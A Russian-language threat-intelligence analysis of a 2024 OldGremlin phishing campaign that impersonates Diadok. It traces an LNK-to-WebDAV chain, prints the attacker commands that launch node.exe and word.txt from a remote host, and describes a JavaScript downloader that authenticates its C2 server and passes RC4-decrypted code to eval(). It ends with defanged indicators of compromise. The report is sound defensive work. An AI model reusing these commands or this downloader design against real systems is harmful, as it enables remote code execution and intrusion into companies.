Группировка вымогателей OldGremlin сеяла страх среди российских компаний в 2020-2022 годах, суммы требуемых выкупов исчислялись миллионами, а в 2022 году в одной из атак ценник поднялся до 1 миллиарда рублей. Мы писали об атакующих в исследованиях, например, здесь и здесь.

Группа была неактивна с сентября 2022 года, или по крайней мере не попадала в наше поле зрения. Но вот почти спустя два года злоумышленники снова дали знать о себе. Специалисты F.A.C.C.T. проанализировали новую рассылку и новый инструмент атакующих – OldGremlin.JsDownloader. О новых открытиях, связанных с известной группировкой вымогателей, рассказал специалист по анализу вредоносного кода департамента Threat Intelligence компании F.A.C.C.T. Артем Грищенко.

Письмо от “Диадок”

Аналитики компании F.A.C.C.T. обнаружили загруженное на платформу AnyRun электронное письмо, которое было отправлено от имени сотрудницы компании “Диадок” с использованием адреса электронной почты - Ольга Макарова <makarova@diadok[.]net>. Получателем письма являлся сотрудник крупной российской нефтехимической компании.

Письмо было отправлено 12 августа 2024 года и имело тему "Уведомление из Диадок: документы требуют вашего участия".

Домен @diadok[.]net, с которого было отправлено вредоносное письмо, мимикрирует под оригинальный домен компании “Контур.Диадок” - diadoc[.]ru.

Это сразу же привлекло наше внимание, поскольку ранее мимикрия под “Диадок” встречалась в атаках не кого иного, как OldGremlin.

Письмо содержало URL-ссылку (hxxps://diadok[.]net/1ealfus19t) для скачивания файла "счет-фактура.xlsx". После перехода по ссылке будет загружен архив Счет_фактура_от-09-09-2024[.]zip (SHA1: 3e01aae56dc2fac3506987197f48db65423717f9), содержащий LNK-файл "Счет_фактура_от-09-08-2024.xlsx.lnk" (SHA1: a36034740e659fdd06b5827382317965a26b4121). После запуска произойдет подключение к WebDav-серверу (46[.]101[.]122[.]204) и на стороне клиента (в данном случае жертвы) будет выполнена команда:

\\46[.]101[.]122[.]204\DavWWWRoot\node.exe \\46[.]101[.]122[.]204\DavWWWRoot\word.txt

WebDAV (Web Distributed Authoring and Versioning) – это набор расширений и дополнений к протоколу HTTP, поддерживающих совместную работу пользователей над редактированием файлов и управление файлами на удаленных веб-серверах.

Аналитики F.A.C.C.T. сразу же отметили, что ранее WebDAV встречался в атаках OldGremlin.

Загруженный файл node.exe (SHA1: 2826f7ac33b43439ecddd08ad541a7f54a9eb7c0) является Node.js интерпретаторов версии v0.10.48 и доступен для загрузки с официального сайта Node.js (hxxps://nodejs[.]org/) по ссылке hxxps://nodejs[.]org/dist/v0.10.48/node.exe.

И вот еще одно совпадение: в предыдущих атаках OldGremlin также использовались   Node.js интерпретаторы.

Файл word.txt (SHA1: ae22b79a3f55d8fc9c1b78a9cb008fff1c104901) является JavsScript-сценарием, который после запуска выполнит команду в интерпретаторе команд Windows:

cmd.exe /c start /b \\46[.]101[.]122[.]204\DavWWWRoot\schet_faktura-20240811.xlsx

В результате выполнения команды будет открыт XLS-файл приманка с именем schet_faktura-20240811.xlsx (SHA1: ad9e9f1365ad547b7c2eb91717b0cebeefb0e18e), доступный по WebDav-пути: \\46[.]101[.]122[.]204\DavWWWRoot\schet_faktura-20240811.xlsx.

Далее, в контексте текущего процесса JavaScript-сценария, будет запущен дочерний процесс Node.js с использованием команды:

\\46[.]101[.]122[.]204\DavWWWRoot\node\node.exe \\46[.]101[.]122[.]204\DavWWWRoot\word.txt 1

В контексте данного процесса используется файл, расположенный на WebDav-сервере по файловому пути node\node.exe (SHA1: df0dd64c6075a33546ea265b63d8eb153476a9b0). Данный файл отличается от предыдущего node.exe тем, что является другой версией интерпретатора Node.js - v12.22.12, и доступен для скачивания с официального сайта Node.js (https://nodejs[.]org/) по ссылке https://nodejs[.]org/dist/v12.22.12/win-x86/node.exe. Также в данном процессе присутствует аргумент запуска - "1", который используется для изменения поведения сценария. Вместо запуска XLS-файла приманки и очередного дочернего процесса, файл декодирует и запустит JavaScript-сценарий (OldGremlin.JsDownloader). Данный сценарий расположен внутри файла word.txt в Base64 виде. 

Анализ инструмента атакующих - OldGremlin.JsDownloader

JavaScript-сценарий (OldGremlin.JsDownloader) был классифицирован нами как Downloader, в задачи которого входит загрузка и выполнение произвольных JavaScript-сценариев.

Данный скрипт исполняется в виде анонимной функции. После того как она будет запущена, выполнится подключение к серверу 157[.]230[.]18[.]205:80, после чего на C2-сервер будет отправлен случайно сгенерированный набор данных размером 32 байта. Полученным ответом является подпись отправленного набора данных. Далее выполнится проверка полученной подписи с заданными параметрами публичного ключа:

{
	format: "der",
	type: "spki",
	key: Buffer.from("MCowBQYDK2VwAyEAnUWQ2w5AfqWmgJaet7RQI1smO6EPHQHl+zSaWrZtqdc=","base64")
}

В случае, если проверка подписи прошла успешно, OldGremlin.JsDownloader будет ожидать данных от C2-сервера. После того как вредоносный загрузчик получит данные от сервера, они будут расшифрованы и переданы в функцию eval(), которая позволяет выполнить произвольный JavaScript-код. Алгоритм шифрования данных - RC4, где ключом является хеш-сумма MD5, полученная от случайно сгенерированного набора байт, который был отправлен на сервер ранее.

Выводы

Исходя из имеющихся техник, тактик и процедур, выявленных в новой атаке, мы предполагаем, что за атакой стоит группировка OldGremlin.

Индикаторы компрометации

Файлы

Архивы

LNK-файлы

XLSX-файл

JavaScript-сценарий

Доменные имена

• diadok[.]net

• 1cbit[.]org

• diadok-documentscdn.c688de[.]com

IP-адреса

• 165.22.80[.]171

• 46.101.122[.]204

• 157.230.18[.]205

URL-ссылки

• hxxps://diadok[.]net/4qcn9ducdw

• hxxps://1cbit[.]org/m9iuabiz

• hxxps://1cbit[.]org/yvbo6wk6lk

• hxxps://1cbit[.]org/wrwpf

• hxxps://diadok[.]net/yh45dsvo

• hxxps://1cbit[.]org/9amh

• hxxps://diadok[.]net/g24c

• hxxps://diadok[.]net/1ealfus19t

• hxxps://1cbit[.]org/0mfu

• hxxps://1cbit[.]org/wqt49

• hxxps://diadok[.]net/4bhjk9j

• hxxps://diadok[.]net/ciuw297j

• hxxps://diadok[.]net/jpkkq8ccf6

• hxxps://diadok[.]net/qmkt2da6qh

• hxxps://1cbit[.]org/2z0zv6qms0

• hxxp://diadok-documentscdn.c688de[.]com/

• hxxp://diadok-documentscdn.c688de[.]com/schet_faktura-20240811.xlsx

• hxxp://diadok-documentscdn.c688de[.]com/node.exe

• hxxp://diadok-documentscdn.c688de[.]com/node/node.exe

• hxxp://diadok-documentscdn.c688de[.]com/word.txt

• hxxp://46.101.122[.]204/

• hxxp://46.101.122[.]204/schet_faktura-20240811.xlsx

• hxxp://46.101.122[.]204/node.exe

• hxxp://46.101.122[.]204/node/node.exe

• hxxp://46.101.122[.]204/word.txt